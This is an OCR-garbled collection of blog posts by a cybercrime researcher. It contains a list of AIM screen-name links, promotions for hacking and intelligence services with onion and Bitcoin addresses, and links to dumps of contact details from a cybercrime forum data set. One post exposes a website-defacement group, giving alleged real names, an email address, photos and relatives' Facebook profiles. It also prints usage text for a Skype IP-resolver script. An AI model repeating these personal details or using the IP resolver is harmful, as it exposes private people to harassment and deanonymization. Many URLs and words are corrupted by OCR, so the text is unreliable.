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aim:goim?screenname=MrUntouchableSC 

&message=Hello+Are+you+there? 

aim:goim?screenname=mrmojorising97 

&message=Hello+Are+you+there? 

aim:goim?screenname=MonetaryAffairs 

&message=Hello+Are+you+there? 



aim:goim?screenname=Mofia + MG 
&message=Hello+Are+you+there? 

aim:goim?screenname=mikeyb7895 

&message=Hello+Are+you+there? 

aim:goim?screenname=miamimac305 

&message=Hello+Are+you+there? 

aim:goim?screenname=meyercl01 

&message=Hello+Are+you+there? 

aim:goim?screenname=MentalHpscotch 

&message=Hello+Are+you+there? 

aim:goim?screenname=menlochronic 

&message=Hello+Are+you+there? 

aim:goim?screenname=madcarder@aol.com 
&message=Hello+Are+you+there? 

aim:goim?screenname=mach844 

&message=Hello+Are+you+there? 

aim:goim?screenname=LOSSisback 

&message=Hello+Are+you+there? 

aim:goim?screenname=linuxgeek99 

&message=Hello+Are+you+there? 

aim:goim?screenname=LinuxDevil 

&message=Hello+Are+you+there? 

aim:goim?screenname=lazystatefan 

&message=Hello+Are+you+there? 


aim:goim?screenname=lady 



aim:goim?screenname=kickin hard 2002 
&message=Hello+Are+you+there? 

aim:goim?screenname=jwillvip 

&message=Hello+Are+you+there? 

aim:goim?screenname=johnvdl8 

&message=Hello+Are+you+there? 

aim:goim?screenname=JMOExtremeS10 

&message=Hello+Are+you+there? 

aim:goim?screenname=jeffsm31337 

&message=Hello+Are+you+there? 

aim:goim?screenname=jedisgod 

&message=Hello+Are+you+there? 

aim:goim?screenname=jeadien 

&message=Hello+Are+you+there? 

aim:goim?screenname=JCDyer82 

&message=Hello+Are+you+there? 

aim:goim?screenname=j0ke+y4+mind 

&message=Hello+Are+you+there? 

aim:goim?screenname=lrOnMaN800 

&message=Hello+Are+you+there? 

aim:goim?screenname=IDLineNTT 

&message=Hello+Are+you+there? 

aim:goim?screenname=icerootl 

&message=Hello+Are+you+there? 

aim:goim?screenname=lamOms 

&message=Hello+Are+you+there? 



aim:goim?screenname=iamaballer847 

&message=Hello+Are+you+there? 

aim:goim?screenname=HRSAFTER 

&message=Hello+Are+you+there? 

aim:goim?screenname=gosunsl965 

&message=Hello+Are+you+there? 

aim:goim?screenname=globalflux 

&message=Flello+Are+you+there? 

aim:goim?screenname=Frozenct 

&message=Flello+Are+you+there? 

aim:goim?screenname=fonefag 

&message=Flello+Are+you+there? 

aim:goim?screenname=flameboysk8erl3 

&message=Flello+Are+you+there? 

aim:goim?screenname=firewirelD 

&message=Flello+Are+you+there? 

aim:goim?screenname=FenderESP 

&message=Flello+Are+you+there? 

aim:goim?screenname=Feces@Poop.org 
&message=Flello+Are+you+there? 

aim:goim?screenname=fdsf 

&message=Flello+Are+you+there? 

aim:goim?screenname=everybodyschild 

&message=Flello+Are+you+there? 


aim:goim?screenname=esolemio 

&message=Flello+Are+you+there? 



aim:goim?screenname=erols26 

&message=Hello+Are+you+there? 

aim:goim?screenname=EIMariachiMoco 

&message=Hello+Are+you+there? 

aim:goim?screenname=Edgarkrasav 

&message=Hello+Are+you+there? 

aim:goim?screenname=EddieG2277 

&message=Hello+Are+you+there? 

aim:goim?screenname=edOwn 

&message=Hello+Are+you+there? 

aim:goim?screenname=drunknsailorl 

&message=Hello+Are+you+there? 

aim:goim?screenname=dk3 

&message=Hello+Are+you+there? 

aim:goim?screenname=djdonte69 

&message=Hello+Are+you+there? 
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aim:goim?screenname=Degauss007 

&message=Hello+Are+you+there? 

aim:goim?screenname=dEeliriOous 

&message=Hello+Are+you+there? 

aim:goim?screenname=dOI3mlk3 

&message=Hello+Are+you+there? 

aim:goim?screenname=cyptdog 

&message=Hello+Are+you+there? 



aim:goim?screenname=crommnz 

&message=Hello+Are+you+there? 


aim:goim?screenname=cpuaddictl23 

&message=Hello+Are+you+there? 

aim:goim?screenname=chemist+exposed 

&message=Hello+Are+you+there? 

aim:goim?screenname=CASLUSCLAY(g)AOL.COM 

&message=Hello+Are+you+there? 

aim:goim?screenname=cardseller420 

&message=Hello+Are+you+there? 

aim:goim?screenname=Brydenn33 

&message=Hello+Are+you+there? 

aim:goim?screenname=Boomsicka 

&message=Hello+Are+you+there? 

aim:goim?screenname= BoOty MOnster 
&message=Hello+Are+you+there? 

aim:goim?screenname=Bluedevelz 

&message=Hello+Are+you+there? 

aim:goim?screenname=BLaZiNKeWP 

&message=Hello+Are+you+there? 

aim:goim?screenname=blackrob91@aol.com 
&message=Hello+Are+you+there? 

aim:goim?screenname=BlaCkiCe8636 

&message=Hello+Are+you+there? 

aim:goim?screenname=BlackBagTricks 

&message=Hello+Are+you+there? 



aim:goim?screenname=BigBoil881 

&message=Hello+Are+you+there? 

aim:goim?screenname=benjaminbahr 

&message=Hello+Are+you+there? 

aim:goim?screenname=Belacel23 

&message=Hello+Are+you+there? 

aim:goim?screenname=badandyl318 

&message=Hello+Are+you+there? 

aim:goim?screenname=Ashlkam 

&message=Hello+Are+you+there? 

aim:goim?screenname=Asdf324tt 

&message=Hello+Are+you+there? 

aim:goim?screenname=ar+naf 

&message=Hello+Are+you+there? 

aim:goim?screenname=ApUzllLa 

&message=Hello+Are+you+there? 

aim:goim?screenname=anon raider 
&message=Hello+Are+you+there? 

aim:goim?screenname=alkoholikboy 

&message=Hello+Are+you+there? 

aim:goim?screenname=airj3r 

&message=Hello+Are+you+there? 

aim:goim?screenname=aftermath 1024 
&message=Hello+Are+you+there? 

aim:goim?screenname=absentdreamerr 

&message=Hello+Are+you+there? 



aim:goim?screenname=45645645 

&message=Hello+Are+you+there? 

aim:goim?screenname=llllll 

&message=Hello+Are+you+there? 

Let's show them how it's done! Send a message at 
ddanchev@cryptogroup.net to coordinate and discuss! Stay 

tuned! 

1. https://!.bp.blo as pot.com/-izGFehF5 l 9A/XabtzV0k- 

ll/AAAAAAAA Iak/ p6-b3a4oH-O wca 7K4TTK6luu- 

Oc9XiFHACLcBGAsYHO 

/sl6Q0/Western Union ShadowCrew Cvbercrime Forum. pna 
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New Commercial Security Research OSINT Cybercrime 
Research and Threat Intelligence Gathering Ser¬ 
vices Portfolio Available On Demand! (2019-11-02 
18:14) 

Dear blog readers, 

I wanted to let everyone know of a currently active 
commercial portfolio of services that I'm publicly offering 








for the purpose of reaching out to colleagues and friends 
including companies vendors and organizations who might 

be interested in working with me for the purpose of obtaining 
access to never-published before Security Research 

analysis reports briefs podcasts and various other 
commercially obtainable virtual and cyber assets that you 
and your 

organization can take advantage of. 

Approach me at - dancho.danchev@hush.com today to 
discuss! 

Key Commercial Services that I'm currently offering 
include: 
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• [l]Security Services 

• [2]OSINT Services 

• [3]Hacking Services 

• [4]lntelligence Services 

• [5]Geopolitical Services 

Including the following commercial services available 
on [6]Patreon Community: 

• Real-Time Security Consultation 

• Security Newsletter 

• Cybercrime Blog Post 



• Security Podcast 

• Malware Analysis 

• Threat Intelligence Analysis 

• Security Workshop 

• OSINT Analysis 

• Geopolitical Analysis 

• Threat Actor Profiling 

• National Security Analysis 

• Cyber jihad Analysis 

• Dark Web Intelligence and OSINT Analysis 

• Security Presentation 

• Cyber Security Business Development 

• Red Team Penetration Testing Assessment 

• Blue Team Penetration Testing Assessment 

• Target of Opportunity Targeting 

• Cybercrime Forum Monitoring 

• Underground Chatter Monitoring 

• Network Deception Consultation 

• Military Scenario Building 
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• Cyber Warfare Scenario Building 

• OSINT Enrichment and Data Mining 

• Cyber Warfare Program Estimation 

• Weapons System Analysis 

• Cyber SIGINT and Cyber Assets Discovery 
Stay tuned! 

1. https://unit-123.or g /securitv-services 

2. https://unit-123.or g /osint-services 

3. https://unit-123.or g /hackin g -services 

4. https://unit-123.or g /intelli g ence-services 

5. https://unit-123.or g/g eopolitical-services 

6. https://www.patreon.com/ddanchevl23 
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New Cybertronics - VR for Hackers and Security 
Experts Dark Web Onion Address (2019-12-02 10:15) 

[1] 

Dear blog readers, 

I wanted to let everyone know that I've recently changed the 
official Dark Web Onion address for my Cybertronics - 

















VR for Hackers and Security Experts Project including the 
actual Bitcoin donation address. 

GOt Bitcoin? Consider going through the project proposal 
today - http://lkzihepprlhxtvbutjedoazbsqd4avmif- 

hpjms3zuq7itceiu4qajwad.onion/ including to make a 
possible Bitcoin donation using the following Bitcoin 
Address: 

3J8Jt7XCBGtCL6XRLTWhKfRQBmhhqGs4aP 

I wanted to say a big thanks to everyone who approached me 
in terms of the project including to actually 

make a donation. The official schedule release is scheduled 
for January, 2020 and I'll make sure to keep everyone 

posted on current and future project updates. 

Stay tuned! 

1. httos://!.bo.blo as oot.com/- 

ehaEPpBHRKw/XeTGikGH8TI/AAAAAAAA I xY/ACcKr9vGHP aP 

Wali SdxE-4Ywa-oadLb6 a CLcBGAsYHO 

/sl600/Cvbertronics. pna 
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World Hacker Global Domination Group 

-Est. 2D19- 


Official World Hacker Global Domination Group 
(WHGDG) Dark Web Onion Launch! (2019-12-02 10:16) 

Dear blog readers, 

I've been spending more time on the Dark Web these days 
including the active launching of a second Dark 

Web Onion and the official launch of the World Hacker Global 
Domination Group (WHGDG) which is basically a Call 

for Papers Call for Participation and Call for Innovation 
request on behalf of me for the purpose of reaching out to 



the U.S Intelligence Community as an independent 
contractor for the purpose of presenting and eventually 
getting 

funding for a variety of commercial cyber security and 
hacking including Threat Intelligence and Offensive Cyber 

Warfare Projects including the active recruitment of new 
members. 

Check out the Official Dark Web Onion: 

http://nexvibpe4xszfx4cp2jldkdyhnjnah5qnckoagoiry3 
vpyv5eheh55id.onion/ 

and don't forget to visit Cy- 

bertronics - Virtual Reality Social Network for Hackers and 
Cyber Security Experts Bitcoin-accepting Project - 

http://ca7brwpxmnbssdoh4dfoijyr7zwetob74x3berlvm 
eekhmkt7zcjdjqd.onion/ and donate today! 

How you can participate? 

• Visit the Dark Web Onion and go through the Call for 
Participation Call for Papers and Call for Innovation and 

approach me at ddanchev@cryptogroup.net in case you 
believe that you can contribute with knowledge data 
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and expertise including the technical "know-how" to 
participate in any of the Key Points mentioned in the Dark 
Web Onion 



Stay tuned for a major Web Site update by the end of the 
week including the production of an extremely popular 

Security Podcast Security Vlog and an additional set of 
never-published before possibly classified and sensitive 

Technical Data and Cyber Security and Hacking resources. 

Enjoy! 
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Dancho Danchev 

@danchodanchev 

Founder and Chief Executive Officer at Stealth Startup, 
Cybercrime Researcher Security Blogger at Webroot 
Inc. 

en.wikipedia org/wiki/Dancho_Da... 


Dancho Danchev's Twitter Account - 2010 - Direct 
Download Link - Historical OSINT (2019-12-02 10:19) 

Dear blog readers, 

Takes you back doesn't it? I've decided to share with you a 

[l]direct download link of my old [2]Twitter ac¬ 
count for you to download and go through and to say big 
thanks to everyone who's been keeping in touch with me 

throughout 2008-2013 including actual research work and 
related research inquiries. 

Consider going through the archive and catching up with 
some of my research circa 2010-2014 and approach 


me - ddanchev@cryptogroup.net with your feedback or just 
to say hi in case you remember some of the research 

which I used to publish back then. 

Stay tuned! 

1. https://unit-123.or g/wp- 

content/uploads/2019/ll/Dancho Danchev Tweets 2010- 

1. zi p 

2. https://twitter.com/danchodanchev 
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Join me on Medium! (2019-12-02 10:59) 










Dear blog readers, 

I wanted to let everyone know that I've recently joined 
[ljMedium and that I intend to post a variety of edito¬ 
rial type of articles on a daily basis including the fact that I 
was recently featured as a Top Writer in [2]Privacy. 

Missing the editorial? Consider going through my old 
[3]ZDNet Zero Day Blog content archive including the 

following recently published editorial type of articles on 
Medium: 

• [4]Assessing U.S Military Cyber Operational 
Capabilities to Counter Pro-ISIS Internet 
Infrastructure 

• [5]My Involvement in the Top Secret GCHQ "Lovely 
Horse" Program and the Existence of the Karma 
Police 

• [6]Kaspersky's Antivirus Products the NSA and U.S 
National Security — An Analysis 

• [7]Assessment of U.S Intelligence Community Cyber 
Surveillance Programs and Tradecraft — Part One 

• [8]How the NSA utilized Iranian Cyber Proxies To 
Participate in the BOUNDLESS INFORMANT Program? 

• [9]Exposing GCHQ's Top Secret "GORDIAN KNOT" 
Cyber Defense Sensor Program — An Analysis 

• [10]Exposing GCHQ's URL-Shortening Service and Its 
Involvement in Iran's 2009 Election Protests 
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Stay tuned! 

1. https://medium.eom/@danchQdanchev 

2. https://medium.com/ta a/ privac v 

3. https://www.zdnet.com/meet-the-team/us/dancho- 
danchev/ 

4. 

https://medium.eom/@danchodanchev/assessin a -u-s- 
militar v-c vber-operational-capabilities-tQ-counter-pro-i 

sis-internet-infrastructure-e4914bd8fb8c 

5. 

httPs://medium.com/@danchodanchev/mv-involvement-in- 

the-too-secret- a cha-lovelv-horse-oro a ram-and-the-exi 

stence-Qf-the-karma-police-daaf08b028a2 

6 . 

httPs://medium.com/@danchodanchev/mv-involvement-in- 

the-top-secret- a chq-lovelv-horse-pro a ram-and-the-exi 

stence-of-the-karma-police-daaf08b028a2 

7. https://medium.com/@danchodanchev/assessment-of-u-s- 

intelli a ence-communit v-c vber-surveillance-pro a rams-and 

-tradecraft-part-one-24c29418107b 

8 . 

https://medium.com/@danchodanchev/how-the-nsa-utilized- 

iranian-cvber-proxies-to-particioate-in-the-bound 
















































jess nformant-pro cs ram• e82045d44848 

9. 

httDs://medium.com/( g )danchodanchev/exposin a-a chas-to p- 

secret- a ordian-knot-cvber-defense-sensor-pro a ram-an 

-analvsis-db64aa8a62ea 

10. https://medium.cem/( g )danchedanchev/expesin a-achas- 
url-shorten in a -service-and-its-involvement-in-iran-s-20 

09-election-protests-6c6a9282630 
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gOt Bitcoin? - Part Two (2019-12-04 18:15) 


Dear bleg readers, 





















I wanted to let you know that I've recently changed to a 
permanent [l]Dark Web Onion address - for my 

[2]Cybertronics - Virtual Reality Social Network for 
Hackers and Security Experts where I'm currently 
soliciting 

Bitcoin donations for the purpose of launching the project in 
January, 2020. 

Got Bitcoin? Consider visiting the Dark Web Onion and 
making a donation today and stay tuned for the up¬ 
coming updates and actual launch of the project in January, 
2020 - http://lkzihepprlhxtvbutjedoazbsqd4avmif- 

hpjms3zuq7itceiu4qaj wad. onion/ 

Stay tuned! 

1. https://ddanchev.blo as oot.com/2019/08/ a 0t-bitcQin.html 

2. https://ddanchev.blo as pot.com/2019/12/new-cvbertronics- 
vr-for-hackers-and.html 
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Announcing New Hacking Security and Hacktivism- 
Themed Online Forum Community! Join me Today! 

(2019-12-12 19:00) 

I FRAME: [l]https://www.youtube.com/embed/naiklltDKlw? 
featu re=player _embedded 

Dear blog readers, 

I've recently launched an extremely popular and 
comprehensive Hacking and Security possibly Hacktivism- 
Themed 

Online Forum Community called "[2]Security is Futile" 
using the extremely popular [3]PlushForums Platform 
consisting of over 193 Hacking and Security Topic 
Categories. 

The initial idea behind launching the community is to spread 
data information and knowledge and to provoke 



discussion into various hot Hacking and Security topics 
including to solicit high-profile VIP Hacker and Security 

Experts to actually join the community and contribute with 
content. 

Official "Security is Futile!" Hacking and Security 
Forum Community URL: 

https://forums.offensive-warfare.com 

Stay tuned! 

1. https://www.voutube.com/embed/naiklltDKlw? 
feature=olaver embedded 

2. https://forums.offensive-warfare.com/ 

3. https://plushforums.com/ 
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Announcing Law Enforcement and OSINT Intelligence 
Operation "Uncle George" - Join Me Today! - Part 

Two (2019-12-12 19:12) 

Dear blog readers, 

I wanted to let you know that I've been spending more time 
doing active Security Industry outreach in terms 

of the [1]2019 Cybercrime Forum Data Set and that I've 
already started working with several vendors in terms of 

possible OSINT enrichment and actual processing of the data. 

Perfect timing to say thanks to Ilya Timchenko and 
McAfee for actually reaching out and managing to process 



the following artifacts from the actual Data Set which I've 
decided to publicly share with everyone who reaches out 

and expresses interest in working with me on the Data Set 
with the idea to possibly assist the Security Community and 

Law Enforcement in terms of tracking down the individuals 
behind these campaigns and actually shutting them down. 

Possible Personally Identifiable Artifacts Found in the 
Actual Data Set Include: 

• [2]Cybercriminal Cryptocurrency Addressess 

• [3]Cybercriminal Emails 

• [4]Cybercriminal ICQ Numbers 

• [5]Cybercriminal Phone Numbers 

• [6]Cybercriminal QQ IDs 
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• [7]Cybercriminal Telegram IDs/[8]Telegram IDs 

• [9]Cybercriminal Dark Web Onion Addresses 

• [10]Cybercriminal Viber Accounts 

• [ll]Cybercriminal VK Accounts 

• [12]Cybercriminal XMPP Accounts 

Including the following massive update courtesy of me 
including all the publicly obtainable [13]Email Addresses 

obtained from the 2019 Cybercrime Forum Data Set 
including all the publicly obtainable [ 14]IP Addresses 




obtained 


from the 2019 Cybercrime Forum Data Set which appear to 
be mostly Socks4/Socks5 and publicly accessible 

compromised hosts used for "island-hopping" tactics. 

I'll be posting an updated set of analysis and data regarding 
the currently ongoing [15]Law Enforcement and 

OSINT Intelligence Operation "Uncle George" anytime 
soon. 

Approach me at ddanchev@cryptogroup.net in case you're 
interested in working with me on this project or 

want to obtain access to the actual Data Set for possible 
OSINT enrichment and research purposes. 

Stay tuned! 

1. https://ddanchev.blo as pot.com/2019/10/announcin a -law- 
enforcement-and-osint.html 

2. https://unit-123.or g/wp- 
content/uploads/2019/12/cr v ptocu rrencv.txt 

3. https://unit-123.or g/wp- 
content/uploads/2019/12/emails.txt 

4. https://unit-123.or g/wp- 
content/uploads/2019/12/emails.txt 

5. https://unit-123.or g/wp- 
content/uploads/2019/12/phone.txt 


6. https://unit-123.or a/w p-content/uploads/2019/12/q q.txt 

























7. https://unit-123.or g/wD- 
content/u ploads/2 019/12/tele a raml.txt 

8. https://unit-123.or g/wp- 
content/u ploads/2 019/12/tele a ram2.txt 

9. https://unit-123.or a/w p-content/uploads/2019/12/tor.txt 

10. https://unit-123.or g/wo- 
content/u ploads/2 019/12/viber.txt 

11. https://unit-123.or a /wp-content/uploads/2019/12/vk.txt 

12. https://unit-123.or a/wp- 
content/uploads/2019/12/xm p p.txt 

13. https://unit-123.or g/wp- 
content/uoloads/2019/12/Misc Ol.txt 

14. https://unit-123.or a /w p- 
content/uploads/2019/12/Misc 02.txt 

15. https://ddanchev.blo as pot.com/2Q19/10/announcin a -law- 
enforcement-and-osint.html 
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Happy Holidays! (2019-12-23 20:08) 

Dear blog readers, 

It's been a pleasure and an honor to serve your needs since 
December, 2005 when I've officially opened this 

blog while working as a Managing Director for 
Astalavista.com - The Underground and I sincerely hope that 
you'll 



continue to find my research informative and quality enough 
to further recommend my personal blog to friends and 

colleagues including to possibly approach me in terms of 
seeking additional information regarding a particular blog 

post or to actually "say hi" and "keep up the good fight" type 
of message. 

My 2020 primary contact points include: 

Personal Email - ddanchev@cryptogroup.net 

Social Media Accounts - [l]Twitter f [2]Linkedln, 
[3]Facebook, [4]Angellist, [5]YouTube, [6]Medium 

IM and Skype ID: [7]dancho _danchev _ 

Web properties that I'm currently running include - 

[8]0ffensive Warfare 2.0 and [9]Unit-123.org 

XMPP/OMEMO ID for Real-Time Conversation: 

90184@armadillophone.com which is basically compatible 
with 

[10]ChatSecure [ll]Conversations and [12]Dino - feel free to 
install any of these applications in case you're not using 
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them already and feel free to "say hi". 

Happy holidays and thanks a lot for everyone who's been 
keeping in touch and keeping up the good fight! 

Stay tuned! 

1. https://twitter.com/dancho danchev 



2. https://linkedin.com/in/danchodanchev 

3. https://www.facebook.com/dancho.danchev.1048 

4. https://an a el.co/dancho-danchev 

5. https://www.voutube.com/channel/UC- 
kG5HI0iravFMfukwEPKfw 

6. https://medium.eom/@danchodanchev/ 

7. https:// i oin.sk v pe.com/invite/cf5 a mBfNdeYb 

8. https://forums.offensive-warfare.com/ 

9. https://unit-123.or g/ 

10. https://chatsecure.or g/ 

11. https://conversations.im/ 

12. https://dino.im/ 
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Hackeado por HighTech Brazil HackTeani 
No\One - CrazyDuck - Otrasher - L34NDR0 





















Exposing High Tech Brazil Hack Team Mass Web Site 
Defacement Group - An OSINT Analysis 

(2019-12-27 15:38) 

It's been a while since I've last posted on quality update 
further detailing the inner workings of a high-profile and 

prominent Web Site Defacement group that has managed to 
successfully compromise thousands of Web sites 

internationally that also includes Bulgaria's National Security 
Agency (DANS) - hxxp://dans.org Web site. 

In this post I'll provide actionable intelligence including 
personally identifiable information on the people and 

the gang behind the campaign including an in-depth 
analysis of their tactics techniques and procedures including 

personal photos and social media accounts of the infamous 
High Tech Brazil Hack Team whose responsible for having 

successfully defaced over 5,000 legitimate Web Sites 
internationally. 

Team Members Include: 

- crazyduck - Real Name: Fabian de Souza Peralazzo 

- otrasher- Email: Otrasher@live.com - Social Media Account 

- https://twitter.com/bltchx _ 

- I34NDR0 

- wicked 


- live 



- Smoker 


Sample Photos of High Tech Brazil Hack Team Team 
Members: 
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[22:00:43] CrazyDuck) Nao sei se tu faz 
[22:00:45] (CrazyDuck' Mas tipo 
[22:00:49] (CrazyDuck) Limpar, pegaro papel 
[22:00:52] (CrazyDuck) E dar umaxeiradinha 
[22:00:54] (CrazyDuck) Nuncafez? 

[22:01:04] (SynchrONize) nao 
[22:01:08] (SynchrONize) eu aopenas olho 
[22:01:11] (SynchrONize) pra saber se ja ta limpo 
[22:01:14] (SynchrONize) cheirar e mto gore 
[22:01:15] (SynchrONize) kkkkkkk 

[22:01:21] (CrazyDuck) Teve uma epoca que eu tava mais podrao 

[22:01:25] (CrazyDuck; Antes de dar descarga 

[22:01:32] (CrazyDuck) Eu colocava quase o nariz dentro do vaso 
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SynchrONize gained 


new followers this week 



Gain followers with @justunfollow 
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HELPS 
GET IP: 
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skypc-resolver.pl — help 
skypc-resolver.pl —getip <us«rnAnr> 
skypc-resolver.pl —credits 
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Twitter Social Media Accounts known to have 
participate in the campaign: 


https://twitter.com/xFellipeCT 
https://twitter.com/Kouback _TR _ 
https://twitter.com/bltchx _ 
https://twitter.com/synchrOnlze 
https://twitter.com/aceeeeeeeer 
https://twitter.com/HADESUnsekurity 
https://twitter.com/slayer_owner 
https://twitter.com/Whiskpentest 
https://twitter.com/LulzSecRoot 
https://twitter.com/unknown _br 
https://twitter.com/Atena _Unknown 
https://twitter.com/MandrivaL 

Personally Identifiable Information on High Tech 
Brazil Hack Team Team Members: 

• synchronize 

Real Name: Bruno Maglia 

Facebook Account Profile: 

https://www.facebook.com/brunoa qnp ; 
https://www.facebook.com/brunao.maglia 

Related 


Facebook 



Account 


Profiles: 

https://www.facebook.com/paulasouzzaa; 

https://www.facebook.com/francine.maglia 

https://www.facebook.com/caio.favaratogalvao 

https://www.facebook.com/kel i .favarato - 
https://www.facebook.com/fabiano.galvao.18 

• aceeeeeeeer 
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Real Name: Gustavo Gemen 

Personal 

Photos: 

http://imgur.com/zdRoh33 

http://i mg ur.com/mQfN8jk,49aNcs6,dCQYCgc,XPtKSAB 
; 

http://imgur.com/eKWbZDnJ0iHr7 A, HKu5Jw8; 
http://imgur.com/eKWbZDnJ0iHr7 A,HKu5Jw8 



Facebook Account Profile: 

https://facebook.com/gustavo.gemen 

Related photos: 

http://imgur.com/hZDJSNb,PXjcBsR 
http://i mg ur.com/V6Yu I Bs,B6CgXKo 
http://imgur.com/8wmqbGg,ZKUjMlQ,vKECfQf 
http://imgur.com/GTIiRul,GLtvlZI,vfyAhuu 

Related URLs: 

https://www.youtube.com/channel/UCBgeuuT9sdFOOkFoGnt 

lp6w 

https://koubacktr.wordpress.com/ 

I'll be soon posting an additional set of details on the High 
Tech Brazil Flack Team and I'll be definitely looking 

forward to sharing the necessary details with the Security 
Industry and Law Enforcement in an attempt to track down 

and prosecute the individuals behind these campaigns. 

Stay tuned! 
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Document Outline 


• 2018 
o July 

■ Historical OSINT - Summarizin g 2 Years of 
Webroot's Threat Blo a Posts Research ( 2018-07- 
28 21:00 ) 

o September 

■ Introducin g Threat Data - The World's Most 
Comprehensive Threats Database (2018-09-20 
16:30 ) 

o October 

■ Historical OSINT - iPowerWeb Hacked Hundreds 

of Web Sites Affected ( 2018-10-19 18:17 ) 

■ Historical OSINT - Gumblar Botnet Infects 
Thousands of Sites Serves Adobe Flash Exploits 
( 2018-10-19 22:46 ) 

■ Historical OSINT - A Diverse Portfolio of Fake 

Security Software ( 2018-10-20 20:22 ). 

■ Historical OSINT - Callin g Zeus Home ( 2018-10- 
20 20:25 ) 

■ Historical OSINT - Chinese Government Sites 

Servin g Malware ( 2018-10-20 20:28 ) 

■ Historical OSINT - Hundreds of Bo g us Bebo 
Accounts Servin g Malware ( 2018-10-20 20:29 ) 

■ Historical OSINT - PhishTube Twitter Broadcast 

Impersonated Scareware Servin g Twitter 
Accounts Circulatin g ( 2018-10-20 22:10 ) 

■ Historical OSINT - Massive Blackhat SEP 

Campai g n Courtesy of the Koobface Gan g 
S potted in the Wild (2018-10-20 22:28 ) ~ 

■ Historical OSINT - Latvian ISPs . Scareware . and 
the Koobface Gan g Connection (2018-10-20 

























































22:34 ) 

■ Historical OSINT - Massive Scareware Dro pping 
Campai g n Spotted in the Wild ( 2018-10-20 
22:38 ) ' 

■ Historical OSINT - Malware Domains 
Impersonatin g Goo a le ( 2018-10-20 22:51 ) 

■ Historical OSINT - Massive Blackhat SEP 
Campai g n Spotted in the Wild (2018-10-21 
22:35 ) ' 

■ Historical OSINT - Massive Blackhat SEP 
Campai g n Spotted in the Wild - Part Two (2018- 
10-21 22:47 ) 

■ Historical OSINT - Ro g ue Scareware Dro pping 
Campai g n Spotted in the Wild Courtesy of the 
Koobface Gan g ( 2018-10-21 23:02 ) 

■ Historical OSINT - Profilin g a Portfolio of Active 
419-Themed Scams (2018-10-21 23:08 ) 

■ Historical OSINT - Yet Another Massive Blackhat 

SEP Campai g n Spotted in the Wild (2018-10-21 
23:21 ) 

■ Historical OSINT - Massive Blackhat SEP 
Campai g n Spotted in the Wild Drops Scareware 
( 2018-10-21 23:37 ) 

■ Historical OSINT - Yet Another Massive Blackhat 

SEP Campai g n Spotted in the Wild Dro ps 
Scareware ( 2018-10-21 23:47 ) 

■ Historical OSINT - Spamvertized Swine Flu 
Domains - Part Two (2018-10-21 23:50 ) 

■ Historical OSINT - Massive Blackhat SEP 
Campai g n Spotted in the Wild Drops Scareware 
( 2018-10-21 23:55 ) 

■ Historical OSINT - A Diversified Portfolio of Fake 

Security Software ( 2018-10-22 13:33 ). 

■ Historical OSINT - A Diversified Portfolio of Fake 

Security Software Spotted in the Wild (2018-10- 
22 13:40 ) 




































































■ Historical OSINT - Massive Blackhat SEP 
Campai g n Spotted in the Wild Serves Scareware 
( 2018-10-22 14:05 ) 

■ Historical OSINT - Malicious Economies of Scale - 

The Emer g ence of Efficient Platforms for 
Ex ploitation - 2007 (2018-10-22 16:23 ) 

■ Pa v-Per-Exoloit Acouisition Vulnerabilit y 

Pro g rams - Pros and cons? (2018-10-22 17:47 ), 
o December 

■ C vber Security Pro j ect Investment Proposal - DIA 
Needioedia - Fi g ht Cvbercrime and Cvber l ihad 
With Sensors - Grab Your Co p y Toda y! ( 2018-12- 
16 13:52 ) 

2019 
o January. 

■ Who's Behind BakaSoftware? - OSINT Analysis 
( 2019-01-15 18:32 ) 

■ Exposin g Iran's Most Wanted Cvbercriminals - 
FBI Most Wanted Checklist - OSINT Analysis 

( 2019-01-16 11:09 ) 

■ Historical OSINT - A Portfolio of Fake Tech 
Sup port Scam Domains - An Analysis ( 2019-01- 
16 16:03 ) 

■ The Threat Intelli g ence Market Se g ment - A 
Complete Mockery and IP Theft Compromise - An 
O pen Letter to the U.S Intelli g ence Communit y 
( 2019-01-24 19:25 ) 

o Februar y 

■ Historical OSINT - Re-Shi p pin g Money Mule 
Recruitment "Your Shi p pin g Panel LLC" Scam 
Domain Portfolio Spotted in the Wild (2019-02- 
07 10:14 ) 

■ Historical OSINT - Global Postal Express Re- 
Shio oin g Mule Recruitment Scam Spotted in the 
Wild" (2019-02-07 10:51 ) 







































































■ Historical OSINT - Able Express Courier Service 
Re-Shi p pin g Mule Recruitment Scam Spotted in 
the Wild ( 2019-02-07 12:14 ) 

■ Historical OSINT - Profilin g a T v oosauatted 
Facebook and Twitter Impersonatin g Fraudulent 
and Malicious Domains Portfolio ( 2019-02-07 
15:47 ) 

■ Historical OSINT - Profilin g a Ro g ue and 
Malic i ous Domain Portfol i o of OEM-P i rated 

Software ( 2019-02-07 17:27 ) 

■ Historical OSINT - A Peek Inside The Geor gia 
Government's Web Site Compromise Malware 
Servin g Campai g n - 2010 ( 2019-02-07 17:30 ) 

■ Historical OSINT - Profilin g a Portfolio of Fake 
Visa A p plication Scam Domains ( 2019-02-07 
17:56 ) 

■ Historical OSINT - Sub7 Crew Releases New 
Version on 11th Anniversary of The RAT ( 2019- 
02-07 18:03 ) 

■ Historical OSINT - "I Know Who DDoS-ed Geor gia 

and Bobbear.co.uk Last Summer" ( 2019-02-07 
20:30 ) 

March 

■ Announcin g Offensive Warfare 2.0 - Official 
Hackin g and Security Community Launch ( 2019- 
03-22 15:14 ) 

April 

■ Dancho Danchev's 2010 Disa p pearance - An 
Elaboration - Part Two ( 2019-04-04 05:51 ) 

■ Introducin g Unit-123.or g - Cvber Threat 
Intelli g ence Portal ( 2019-04-12 21:41 ). 

■ Flashpoint Intel Official Web Site Servin g 
Malware - An Analysis ( 2019-04-22 08:32 ), 

May. 

■ Exposin g Yet Another Currently Active 
Fraudulent and Malicious Pro-Hamas Online 












































































Infastructure ( 2019-05-04 19:45 ) 

■ Historical OSINT - Profilin g the Loads.cc 
Enterprise ( 2019-05-04 22:27 ) 

■ Historical OSINT - Massive Scareware Servin g 

Campai g n Spotted in the Wild ( 2019-05-04 
22:41 ) ' 

■ Historical OSINT - Yet Another Massive Scareware 

Servin g Campai g n Courtesy of the Koobface 
Gang ( 2Q19-Q5-Q5 16:47 ) " 

■ Historical OSINT - Yet Another Massive 
Scareware-Servin o Campai g n Courtesy of the 
Koobface Gan g ( 2019-05-05 17:19 ) 

■ Offensive Warfare 2.0 - The Future of Cvber 
Warfare - Hackin g and Cvber Securit y 
Community - Public Re g istration Now Open! 
( 2019-05-15 10:33 ) 

■ Proprietary Threat Intelli g ence Reports Available 
On Demand - Reouest a Co p y Toda y! ( 2019-05- 
28 20:46 ) 

